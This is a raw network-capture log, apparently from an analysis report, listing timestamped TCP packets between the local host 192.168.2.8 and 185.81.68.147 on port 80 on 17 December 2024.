                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.221350908 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.222067118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.222285032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.222378969 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.223057032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.223169088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.223256111 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.224034071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.224117994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.224214077 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.224896908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.225034952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.225162029 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.225800991 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.269830942 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.368005037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.368026972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.368194103 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.368596077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.368705988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.368797064 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.369359970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.369457006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.369779110 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.370297909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.370385885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.370548010 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.371253014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.371273041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.371568918 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.372186899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.372334003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.372453928 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.373121977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.373238087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.373394966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.374135017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.374181986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.374325037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.375026941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.375092983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.375190973 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.375999928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.376149893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.376246929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.376940012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.377058029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.377146006 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.377919912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.378011942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.378384113 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.378837109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.378930092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.379367113 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.379823923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.379940033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.380055904 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.380772114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.380856037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.380965948 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.381695986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.381820917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.381989002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.382699966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.382791042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.382878065 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.383593082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.383783102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.383882046 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.384562016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.384670019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.384808064 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.385550022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.385689974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.385826111 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.386483908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.386598110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.386688948 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.387438059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.387535095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.387876987 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.388355017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.388432980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.388631105 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.389328957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.389420986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.389509916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.390296936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.390403986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.390546083 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.391256094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.391365051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.391535044 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.392193079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.392297029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.392676115 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.393151999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.393273115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.393362999 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.394129992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.394208908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.394457102 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.395073891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.395132065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.395255089 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.395982981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.396141052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.396307945 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.396971941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.397063017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.397166014 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.397912979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.397979975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.398220062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.398821115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.398910999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.399055958 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.399812937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.400044918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.400151968 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.400746107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.400871038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.401412010 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.401746988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.401911020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.402141094 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.402709007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.402827024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.402926922 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.403605938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.403697968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.403879881 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.404580116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.404684067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.404967070 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.405524969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.405654907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.405752897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.406514883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.406656981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.406744003 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.407505035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.407597065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.407685041 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.408762932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.408931017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.409320116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.409427881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.409518003 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.409518003 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.410260916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.410409927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.410722971 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.411298037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.411487103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.412234068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.412502050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.412592888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.412592888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.413187981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.413336992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.413947105 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.414134979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.414263010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.414359093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.415045023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.415158033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.415257931 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.416030884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.416131973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.416219950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.416990995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.417117119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.417922974 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.417998075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.472923994 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.559921026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.559947968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.560172081 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.560365915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.560540915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.560590029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.560674906 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.561549902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.561599970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.561675072 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.562498093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.562614918 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.562650919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.563407898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.563503981 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.563513041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.564344883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.564448118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.564467907 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.565314054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.565412045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.565438032 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.566278934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.566369057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.566387892 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.567266941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.567336082 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.567348003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.568191051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.568291903 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.568306923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.569127083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.569181919 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.569226980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.570112944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.570135117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.570173979 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.571019888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.571079969 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.571110010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.571986914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.572065115 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.572154999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.573002100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.573107958 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.573121071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.573947906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.574038982 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.574120998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.574925900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.574980974 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.575062037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.575905085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.576031923 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.576076031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.576754093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.576843023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.576865911 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.577866077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.577917099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.577934027 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.578655958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.578792095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.578831911 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.579608917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.579727888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.579729080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.580559969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.580718040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.580750942 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.581553936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.581653118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.581675053 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.582454920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.582523108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.582561016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.583448887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.583564043 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.583638906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.584428072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.584500074 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.584592104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.585323095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.585406065 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.585438013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.586268902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.586385012 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.586385965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.587256908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.587331057 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.587419987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.588215113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.588260889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.588279963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.589119911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.589191914 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.589258909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.590138912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.590203047 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.590251923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:07.591037989 CET8049709185.81.68.147192.168.2.8
